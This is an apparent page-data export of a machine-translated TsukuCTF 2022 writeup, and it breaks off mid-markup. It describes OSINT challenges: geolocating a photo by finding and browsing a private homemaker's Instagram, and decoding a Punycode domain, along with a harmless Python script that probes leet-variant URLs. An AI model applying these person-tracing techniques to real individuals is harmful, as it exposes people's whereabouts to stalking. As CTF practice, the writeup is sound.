{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-tsukushi-2022-en","result":{"data":{"markdownRemark":{"id":"0d9c3a28-60ba-5b18-8db6-9065f7b6e608","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-tsukushi-2022\">original page</a>.</p>\n</blockquote>\n<p>I participated in <a href=\"https://tsukuctf.sechack365.com/challenges\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">TsukuCTF 2022</a> and wrote up this writeup.</p>\n<p>Our ranking briefly crept into single digits, but we couldn’t hold it and finished 14th.</p>\n<p>This was also a rare occasion where we competed as team 0neP@dding, which made it especially fun.</p>\n<p>That said, it was only two of us, which felt a little lonely — time to start recruiting members soon.</p>\n<p>As usual, I’m recording the interesting problems we solved and the ones we couldn’t.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c0d1279023367691c228981394a395c2/c1b63/image-20221023185450493.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 100%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACKUlEQVQ4y5VVW44bIRDc+58pR8gN8mMlWtkes8DwGl5DbTdjxnYixfZIJZpX0V0F9kdrDfxxW2vdUQZKhVYKl4tAionmVlQaY5RSkHPpazhmfAzCGCO8930w5UwLM23iuMCnhJAZEQu1vkSYHBB5nsgYzMPYCZlgWRaML64rbMy46IBp9hB02EkbTNJAKotZWljhoCcFq+2+7yFDRmoJJ6lwPF5wPpwh/5wxHSdchIAUE5SUsEpCSwHjHOxikZJnzdDuCVmTL6vw6/Abn4cT1JeGCjNE0ZhXh9oCSiMZkLFtxVX7gfaYYaUSP08ThCIipwgSSw2wziP4pRvlrzHrbK1FIIlKLXCUKc/vhK2tm1M0WRvlkOu1T4KTDDVlrCs5SubkVLGWtRsXu7OJkG8arpTZPM+YjenGpLQ53HEX348ncnobS7TX7DFn2QlDCJCzI5F9d/pVcMlfZBLv5z5X1Qn5/inj4GmCnX6HVGm9xzshn6CthzaUIV8dSv8V8OFM2K/cfcnskqKSu6PhVs7/Su0tS0XPkltGf3q9ZOrMlCEvHBf8FTApG9oP4ttQ7zRkU3zYCJc3CBVl+A+hcxuh8+E9l6kyNUpellvJXUMypGc4BH+CYQqXHOMW/2WKIZftbspzxJ6VoQexX5tByIPa0nNKjU7aFj8DZzRK3saWRw2F+EGTP4m0vuhy2lymZMZYJ+SfdNZhEgdqj+R46K6/ApZK0tMbMf8dfAM9VRWK/tDo0AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c0d1279023367691c228981394a395c2/8ac56/image-20221023185450493.webp 240w,\n/static/c0d1279023367691c228981394a395c2/d3be9/image-20221023185450493.webp 480w,\n/static/c0d1279023367691c228981394a395c2/e46b2/image-20221023185450493.webp 960w,\n/static/c0d1279023367691c228981394a395c2/92f8c/image-20221023185450493.webp 1200w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c0d1279023367691c228981394a395c2/8ff5a/image-20221023185450493.png 240w,\n/static/c0d1279023367691c228981394a395c2/e85cb/image-20221023185450493.png 480w,\n/static/c0d1279023367691c228981394a395c2/d9199/image-20221023185450493.png 960w,\n/static/c0d1279023367691c228981394a395c2/c1b63/image-20221023185450493.png 1200w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c0d1279023367691c228981394a395c2/d9199/image-20221023185450493.png\"\n            alt=\"image-20221023185450493\"\n            title=\"image-20221023185450493\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#osint\">OSINT</a></p>\n<ul>\n<li><a href=\"#banana\">banana</a></li>\n<li><a href=\"#tsukuctf-big-fan-2\">TsukuCTF Big Fan 2</a></li>\n<li><a href=\"#utsukushii\">uTSUKUSHIi</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#misc\">Misc</a></p>\n<ul>\n<li><a href=\"#lucky-number-777\">Lucky Number 777</a></li>\n<li><a href=\"#soder\">soder</a></li>\n<li><a href=\"#nako3ndbox\">nako3ndbox</a></li>\n</ul>\n</li>\n<li><a href=\"#wrap-up\">Wrap-up</a></li>\n</ul>\n<h2 id=\"osint\" style=\"position:relative;\"><a href=\"#osint\" aria-label=\"osint permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>OSINT</h2>\n<h3 id=\"banana\" style=\"position:relative;\"><a href=\"#banana\" aria-label=\"banana permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>banana</h3>\n<p>The challenge was:</p>\n<blockquote>\n<p>Tsukushi is looking at a girl’s social media account. He says: “I want to figure out where this photo was taken so I can go there and take the same shot!”</p>\n<p>Help Tsukushi identify the location. <em>The flag format is TsukuCTF22{latitude_longitude}. Latitude and longitude should be in decimal notation, truncated to 5 decimal places.</em></p>\n</blockquote>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 828px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAUABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMBBAL/xAAXAQEBAQEAAAAAAAAAAAAAAAADAgEE/9oADAMBAAIQAxAAAAG3PlozEEJ0RG5/ANv/xAAZEAADAQEBAAAAAAAAAAAAAAAAAQIRITH/2gAIAQEAAQUCGzhrZbTmrWvyjT//xAAYEQEBAAMAAAAAAAAAAAAAAAAAAQIhQf/aAAgBAwEBPwGScaYo/8QAGBEAAgMAAAAAAAAAAAAAAAAAAAEQEXH/2gAIAQIBAT8B0pz/AP/EAB0QAAEEAgMAAAAAAAAAAAAAAAABAhARITFBYYH/2gAIAQEABj8CNUYdR0MTgwr/ACEj/8QAHBABAAIDAAMAAAAAAAAAAAAAAQAhETFhQVGh/9oACAEBAAE/IcHILrZURNo9RuX1Fi48pmcA6qAKR/EKT//aAAwDAQACAAMAAAAQkCDA/8QAGBEBAQADAAAAAAAAAAAAAAAAAQARQVH/2gAIAQMBAT8QS6S8kmBgv//EABcRAQEBAQAAAAAAAAAAAAAAAAEAEUH/2gAIAQIBAT8Q1yGHZldv/8QAHhABAQACAgIDAAAAAAAAAAAAAREAITFBYXGhscH/2gAIAQEAAT8QQBFDTXzmuSIg0+5jZIdlv1jsdmzLgP8AmiCw/cliWpZeeckAAcE1jJUZWwcZGg9Ln//Z'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7f194810f97eaccf9f5e299d18fa30a0/8ac56/banana.webp 240w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/d3be9/banana.webp 480w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/712de/banana.webp 828w\"\n              sizes=\"(max-width: 828px) 100vw, 828px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7f194810f97eaccf9f5e299d18fa30a0/09b79/banana.jpg 240w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/7cc5e/banana.jpg 480w,\n/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg 828w\"\n            sizes=\"(max-width: 828px) 100vw, 828px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7f194810f97eaccf9f5e299d18fa30a0/b2cd5/banana.jpg\"\n            alt=\"banana\"\n            title=\"banana\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried cropping out the banana mascot in the background and reverse-searching it, but couldn’t find anything for a while. Eventually, narrowing the search to Instagram turned up the account of a homemaker who used this image as her icon.</p>\n<p>Browsing through her personal photos revealed that the wall in the background is at the location of the Tamuning morning market in Guam, and I was able to get the Flag.</p>\n<h3 id=\"tsukuctf-big-fan-2\" style=\"position:relative;\"><a href=\"#tsukuctf-big-fan-2\" aria-label=\"tsukuctf big fan 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>TsukuCTF Big Fan 2</h3>\n<blockquote>\n<p>The problem:\nHe appears to be running a website.</p>\n</blockquote>\n<p>In the previous challenge “TsukuCTF Big Fan 1”, I found through his Twitter account that he runs a website and publishes it at the address indicated by the cipher <code class=\"language-text\">ctf 073b6d com</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 592px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABM0lEQVQoz01Q2XKCQBDkE3IZNSjIJeEQ5BQwasojsSpW8pr//5HOzJi1eOiand7p7t3RPHeByouQtQesT9+Iyi0mfgEjrDANSqn6PIcVNxh7SzwaAZ7MUGr/PJhFGDkJtMxPcQ4TdNtPnH5+0ewv6A4X5G8nxPU7vGWHhMKSZg83beEmDcJig7DaCZbdUebcpIVDdxo7DyjBzzdo91+odmdk6yOcxeo6RJVhxbX0bGpF9Y2zCWzkES8vZMOHaUAXKxSbDxnU5xnV5l9AwqgSEzEksRmWYmTSSpif0T3rRvbiash7eKH9sICTWMB7udN9Cnu94X7iC/gBfU4qgX3EkMUGpalXmUGBoR1j7KaybBXKX2LwWfHc92e0ZyuWRok5jQOY1/1cqpphsZpTHK9nSF9V3B8weM3koueLqQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/8ac56/image-20221023190359304.webp 240w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/d3be9/image-20221023190359304.webp 480w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/0be55/image-20221023190359304.webp 592w\"\n              sizes=\"(max-width: 592px) 100vw, 592px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/8ff5a/image-20221023190359304.png 240w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/e85cb/image-20221023190359304.png 480w,\n/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png 592w\"\n            sizes=\"(max-width: 592px) 100vw, 592px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dea810b2acdd7b6c6bd6da9a4d5eb877/1b853/image-20221023190359304.png\"\n            alt=\"image-20221023190359304\"\n            title=\"image-20221023190359304\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The numbers looked like Leet-cipher substitutions, so I wrote the following script to brute-force plausible combinations.</p>\n<p>However, none of the patterns resolved to a reachable address, and I retired.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> requests\n\nurls <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">for</span> a <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"o\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"oh\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"p\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> b <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"7\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"t\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"l\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"y\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"3\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"e\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">for</span> d <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"8\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"b\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"6\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"i3\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"13\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">for</span> e <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"6\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"g\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"b\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">for</span> f <span class=\"token keyword\">in</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"i7\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"17\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                        s <span class=\"token operator\">=</span> a <span class=\"token operator\">+</span> b <span class=\"token operator\">+</span> c <span class=\"token operator\">+</span> d <span class=\"token operator\">+</span> e <span class=\"token operator\">+</span> f\n                        url <span class=\"token operator\">=</span> <span class=\"token string\">\"http://ctf.{}.com/\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n                        urls<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># For test</span>\nurls<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"https://google.com/\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">for</span> url <span class=\"token keyword\">in</span> urls<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        res <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>res<span class=\"token punctuation\">.</span>status_code<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">break</span>\n    <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">pass</span></code></pre></div>\n<p>Looking at the following writeup, the hint was hidden in a different tweet by the same person.</p>\n<p>Reference: <a href=\"https://nanimokangaeteinai.hateblo.jp/entry/2022/10/23/180703\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">TsukuCTF 2022 writeup - st98’s diary</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuklEQVQY01WO6wqCQBSE9zVqKwnNa+h677KZUkZUKEER9KP3f4vJ3TT0x8eeneHMGcKcEJnpIjvVuD0/WBVXLBiHFecww0zOqruGFeXQvA2o7mNiBAM6bWZFIFETeHAY/LRAfnmgrF7gZY3z/Q1+rODEe7kwNUNJtyzePl04oa2pNtcNn0NnW1jhDk6Sw14XMAL+DxANBP0A8e+3JcIcNyh2IoWR5v3QGaibyLlrodixhAqv1ebLdND4C7T3eiLxU8xUAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a9efa107f1625daabd79328424027d3e/8ac56/image-20221023191049064.webp 240w,\n/static/a9efa107f1625daabd79328424027d3e/d3be9/image-20221023191049064.webp 480w,\n/static/a9efa107f1625daabd79328424027d3e/5ca24/image-20221023191049064.webp 590w\"\n              sizes=\"(max-width: 590px) 100vw, 590px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a9efa107f1625daabd79328424027d3e/8ff5a/image-20221023191049064.png 240w,\n/static/a9efa107f1625daabd79328424027d3e/e85cb/image-20221023191049064.png 480w,\n/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png 590w\"\n            sizes=\"(max-width: 590px) 100vw, 590px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a9efa107f1625daabd79328424027d3e/fcda8/image-20221023191049064.png\"\n            alt=\"image-20221023191049064\"\n            title=\"image-20221023191049064\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Here, “xn” refers to the <code class=\"language-text\">ACE (ASCII Compatible Encoding)</code> prefix used in <code class=\"language-text\">internationalized domain names</code> expressed in Punycode. (Labels with ACE are called “A-labels”.)</p>\n<p>Punycode is an encoding scheme that converts hostnames containing Unicode characters into strings composed only of letters, digits, and hyphens (a subset of ASCII), enabling Unicode-expressed hostnames such as Japanese domain names to be used as Internationalized Domain Names (IDNs) in applications.</p>\n<p>Reference: <a href=\"https://en.wikipedia.org/wiki/Punycode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Punycode - Wikipedia</a></p>\n<p>Punycode can reversibly convert Unicode strings to ASCII strings: ASCII characters are left as-is, while non-ASCII characters are converted to a unique string of alphanumerics and hyphens.</p>\n<p>In practice, prepending “xn—” to the ciphertext and decoding as Punycode yields the following domain name:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 660px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABOklEQVQoz31R23KCMBTk/3+p0/fO2FqreEFaQRGQEBMJECBctglWpw+1e2YnZ5KTzc7GSilBGB0hK4m6qSFriaZtEBwP+JjP4H5uQfRMksbggqNWFWRToqwLlFWh50vwjCEIA2T5BVZAfKz3NiIeIBExaJGAlQRm3/FXcIMNCDuBphScc+QiR1lKtG2LrutGqkahyAso1cL6ojaWZIL34wvm8QTeZY0dX2EvHPiZA/dsI84OMFCtvlhoV1KOQgaDrhtMbz07Dp62Mzj0DYvTVPMVdjKFrfulXl22QCwC7fA8Ouz7XjtRI9M0BWMMZ0pBCIEQAtYm8bBKtvD5Bjt2pccdeOzKQ+bqKEJEYaQZoqrru+BNhGtRI2zOrE5/wGh2GPBnDb3OS43Obrn9B8sE+RPAQxix3xgff8Bv6JMWOkgahR8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/8ac56/image-20221023191904625.webp 240w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/d3be9/image-20221023191904625.webp 480w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/cc661/image-20221023191904625.webp 660w\"\n              sizes=\"(max-width: 660px) 100vw, 660px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/8ff5a/image-20221023191904625.png 240w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/e85cb/image-20221023191904625.png 480w,\n/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png 660w\"\n            sizes=\"(max-width: 660px) 100vw, 660px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/61f96d9fc2ac5b1cfb8fd9e0da0673a1/1f083/image-20221023191904625.png\"\n            alt=\"image-20221023191904625\"\n            title=\"image-20221023191904625\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I thought that would be the answer, but accessing this domain in a browser redirects to a Rickroll.</p>\n<p>That video redirect always gives me flashbacks…</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 662px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAADSklEQVQ4y22T60/TZxTH+4ICvegyLi1a51pK3ZjDMRy6WqAwFZ3JcLCocbrpXGkpQUVxQEv5lV6AgtxXgQKlg47WTqsLbtmyLMONXUwWl5kYfb2/5LPHapxb9uLknCdPns9zLt8jU6vVyOVZbNiwkfaLg3ikaT44epz2C1663SN0dg1ia27j9BkHp07b+ehjJ/aW83T1jCMF5rjkGkGhVFJcbECj0SDLzs5GJpORm6skuvQzN1cf4nd7iSfWuLF6j1T6Vy6PzdI/OMlAaJKh0StMhGNcE3er3/9FPH2XrCw5Op2OvLx8ZDk5OY+BChUzC2tcTd/D65KIfb5G4vrvxFZ+oC8YwuMN4vWFkPwhBobDxFO/8cWth0Ti6yiV6gxDLpc/C1QSWV4j9eWf+Hr94sE6K+k7xK/exhccxNUr0Re4LLyXsakoqZt3uf71AxaSv2SSeVxl7jNAcRifjrG4lEZyuYgufyOgP7Kc/A5//yC9vgF8/WME+ocJzyQE8A+ufXWf+eQ6iifADOu/wLlYgp6uS8zOLxONJWltseFw2Ojx+gV4GKfTjsN5NlNJavU+c4mfMtX9D1DBRCRBZDGJ5HEzPRul1XGKUlM+RmMe5eV6KneWYNQ/xzsNB/hs5VsSN+4I4O2nJf8bKH4Zn73FbHSVFruNKsvrvFFZTsWuCkwv6dhm0rKjrBiL5TXsrXZGpmYIzy0xNLWQSeYpMDs758mEcpCCiwSGljhx0kaNtZa6fQepP3SYpqMfYmvpoL1TaFMaojcwjnfgUwZGIrj7QvwjPTEUlVIlmqrgeaGhju4xIdhJ2tp9uDwTdArRdrpH6fZMCtAULm+Ybu8V3L4ZPMF5+kIxOjyjqFRqsRhqHi2JbKNaySZtIUWaQpoaj/Fe0zHq6w+J+AgNDUd4t/EEhxtPcvz9Zs5d8HDuooTjrJvmNjfO8xJnHJ+wdeuL5OfnZRKTbdK/jMbwKlp9KZuN29liKst4nfBbtu1AX7oTw/bdGMvMGEyvYDAUozcYhZVgKC7hBQErLNRQUFCQMdkucw3VdQew7j1IRaUZS+0+LDVvUVVbj8W6l90WK29Wi37ufxtrbR17zHuorrJgNptFbKaoqAitVpvxj+xv9mUH7Y6dkHUAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/17b797c01a1ede69b9bea5f993b3e52d/8ac56/image-20221023192107089.webp 240w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/d3be9/image-20221023192107089.webp 480w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/90cc3/image-20221023192107089.webp 662w\"\n              sizes=\"(max-width: 662px) 100vw, 662px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/17b797c01a1ede69b9bea5f993b3e52d/8ff5a/image-20221023192107089.png 240w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/e85cb/image-20221023192107089.png 480w,\n/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png 662w\"\n            sizes=\"(max-width: 662px) 100vw, 